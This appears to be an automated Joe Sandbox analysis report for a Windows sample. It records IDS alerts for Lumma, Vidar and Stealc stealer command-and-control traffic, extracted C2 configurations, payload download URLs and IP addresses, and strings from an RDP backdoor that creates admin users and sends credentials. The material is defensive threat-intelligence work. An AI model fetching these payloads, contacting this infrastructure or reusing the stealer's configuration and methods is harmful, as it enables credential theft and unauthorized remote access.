ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:20.501654+0200	2056155	1	Domain Observed Used for C2 Detected	192.168.2.7	49746	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:16.057991+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.7	49739	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:15.091490+0200	2056165	1	Domain Observed Used for C2 Detected	192.168.2.7	49737	172.67.132.32	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:17.012428+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.7	49740	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:22.448015+0200	2056151	1	Domain Observed Used for C2 Detected	192.168.2.7	49749	104.21.77.130	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:21.440377+0200	2056153	1	Domain Observed Used for C2 Detected	192.168.2.7	49748	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:18.038406+0200	2056159	1	Domain Observed Used for C2 Detected	192.168.2.7	49742	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:14.130220+0200	2056177	1	Domain Observed Used for C2 Detected	192.168.2.7	49736	172.67.194.216	443	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:21.731789+0200	2054495	1	A Network Trojan was detected	192.168.2.7	49747	45.132.206.251	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:18.558828+0200	2056156	1	Domain Observed Used for C2 Detected	192.168.2.7	58425	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:20.021116+0200	2056154	1	Domain Observed Used for C2 Detected	192.168.2.7	59642	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:15.546489+0200	2056162	1	Domain Observed Used for C2 Detected	192.168.2.7	56659	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:14.617053+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.7	55367	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:16.523200+0200	2056160	1	Domain Observed Used for C2 Detected	192.168.2.7	57781	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:21.910689+0200	2056150	1	Domain Observed Used for C2 Detected	192.168.2.7	59109	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:20.963294+0200	2056152	1	Domain Observed Used for C2 Detected	192.168.2.7	57807	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:17.515826+0200	2056158	1	Domain Observed Used for C2 Detected	192.168.2.7	60213	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:13.634673+0200	2056176	1	Domain Observed Used for C2 Detected	192.168.2.7	63092	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:37:42.107914+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.7	49714	TCP
2024-09-27T01:38:54.976206+0200	2044247	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.7	49757	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:37:43.462268+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.7	49715	TCP
2024-09-27T01:38:56.340866+0200	2051831	1	Malware Command and Control Activity Detected	5.75.211.162	443	192.168.2.7	49758	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:37:42.107429+0200	2049087	1	A Network Trojan was detected	192.168.2.7	49714	5.75.211.162	443	TCP

ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:17.238598+0200	2827449	1	Attempted User Privilege Gain	147.45.44.104	80	192.168.2.7	49734	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:39:02.736144+0200	2803305	3	Unknown Traffic	192.168.2.7	49762	104.26.12.205	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:38:12.492415+0200	2803270	2	Potentially Bad Traffic	192.168.2.7	49734	147.45.44.104	80	TCP
2024-09-27T01:38:15.051681+0200	2803270	2	Potentially Bad Traffic	192.168.2.7	49734	147.45.44.104	80	TCP
2024-09-27T01:38:17.237892+0200	2803270	2	Potentially Bad Traffic	192.168.2.7	49734	147.45.44.104	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://5.75.211.162/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: stogeneratmns.shop	Avira URL Cloud: Label: malware
Source: wallkedsleeoi.shop	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/api	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/	Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/v	Avira URL Cloud: Label: malware
Source: fragnantbui.shop	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	Avira URL Cloud: Label: malware
Source: offensivedzvju.shop	Avira URL Cloud: Label: malware
Source: https://offensivedzvju.shop/	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5de72d9ebd_rdp.exe	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869/inventory/	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199780418869	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/freebl3.dlll	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/mozglue.dllf	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://147.45.44.104	Avira URL Cloud: Label: malware
Source: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	Avira URL Cloud: Label: malware
Source: https://stogeneratmns.shop/api	Avira URL Cloud: Label: malware
Source: https://ghostreedmnu.shop/api	Avira URL Cloud: Label: malware
Source: https://reinforcenh.shop/os%P	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/nss3.dllz	Avira URL Cloud: Label: malware
Source: https://5.75.211.162/nss3.dlla	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\CFHIIEHJKK.exe	Avira: detection malicious, Label: HEUR/AGEN.1311769
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5de72d9ebd_rdp[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1311769

Found malware configuration

Source: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "b26735cbe8ca9e75712ffe3aa40c4a60"}
Source: 16.2.RegAsm.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["fragnantbui.shop", "wallkedsleeoi.shop", "stogeneratmns.shop", "offensivedzvju.shop", "drawzhotdog.shop", "ghostreedmnu.shop", "reinforcenh.shop", "vozmeatillu.shop", "gutterydhowi.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\RDP Wrapper\rdpwrap.dll	ReversingLabs: Detection: 54%
Source: C:\ProgramData\BKKFCFBKFC.exe	ReversingLabs: Detection: 42%
Source: C:\ProgramData\GIEHJDHCBA.exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5db9e54794_vfkagks[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5dbaca34ac_lfdnsafnds[1].exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\CFHIIEHJKK.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66f5de72d9ebd_rdp[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wallkedsleeoi.shop
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	6_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	6_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	6_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	6_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA7A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	6_2_6CA7A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA744C0 PK11_PubEncrypt,	6_2_6CA744C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA44420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	6_2_6CA44420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA74440 PK11_PrivDecrypt,	6_2_6CA74440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAC25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	6_2_6CAC25B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA5E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	6_2_6CA5E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA58670 PK11_ExportEncryptedPrivKeyInfo,	6_2_6CA58670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA7A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	6_2_6CA7A650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA9A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	6_2_6CA9A730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CAA0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	6_2_6CAA0180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA743B0 PK11_PubEncryptPKCS1,PR_SetError,	6_2_6CA743B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA97C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	6_2_6CA97C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA9BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	6_2_6CA9BD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA57D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	6_2_6CA57D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA99EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	6_2_6CA99EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA73FF0 PK11_PrivDecryptPKCS1,	6_2_6CA73FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA79840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	6_2_6CA79840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA73850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	6_2_6CA73850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_6CA9DA40 SEC_PKCS7ContentIsEncrypted,	6_2_6CA9DA40

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.ini
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Directory created: C:\Program Files\RDP Wrapper\rdpwrap.dll

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.7:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.194.216:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.32:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.7:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.77.130:443 -> 192.168.2.7:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.128.144:443 -> 192.168.2.7:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.211.162:443 -> 192.168.2.7:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49765 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.6.dr
Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000006.00000002.2084316786.000000002678A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2148470094.000000006FA8D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.6.dr
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 00000006.00000002.2077927206.0000000020816000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.6.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000006.00000002.2111425893.000000003E534000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.6.dr
Source:	Binary string: c:\rje\tg\vlt\obj\Release\ojc.pdb source: GIEHJDHCBA.exe.6.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.6.dr
Source:	Binary string: rdpclip.pdbH source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, RDPWInst.exe.20.dr
Source:	Binary string: costura.costura.pdb.compressedlB source: CFHIIEHJKK.exe, 00000014.00000002.2475649051.00000000030A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: <>c__DisplayClass0_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1<>u__2Func`2Dictionary`2<Main>d__5get_UTF8<Module><Main>Q2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBSystem.IOGetPublicIP_Costuracostura.metadatamscorlibSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheInvokeEnumerableIDisposableget_AsyncWaitHandleDownloadFileget_Nameget_MachineNamefullNameGetAdminGroupNameuserNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValueadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamset_ItemSystemSymmetricAlgorithmHashAlgorithmRandomrandomICryptoTransformTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatObjectSelectBeginConnectSystem.NetWaitForExitIAsyncResultGetResultSetResultToLowerInvariantWebClientTcpClientEnvironmentStartConvertRDPPortportget_StandardOutputset_RedirectStandardOutputExecuteCommandWithOutputMoveNextSystem.Textset_CreateNoWindowToArrayset_KeyContainsKeySy
Source:	Binary string: costura.costura.pdb.compressed source: CFHIIEHJKK.exe, 00000014.00000000.2001873722.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, CFHIIEHJKK.exe.6.dr, 66f5de72d9ebd_rdp[1].exe.6.dr
Source:	Binary string: rdpclip.pdbJ source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, RDPWInst.exe.20.dr
Source:	Binary string: c:\rje\tg\obj\Release\ojc.pdb source: file.exe
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 00000006.00000002.2104122176.0000000032660000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.6.dr
Source:	Binary string: RfxVmt.pdb source: RDPWInst.exe, 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, rfxvmt.dll.30.dr, RDPWInst.exe.20.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000006.00000002.2107878722.00000000385C6000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.6.dr
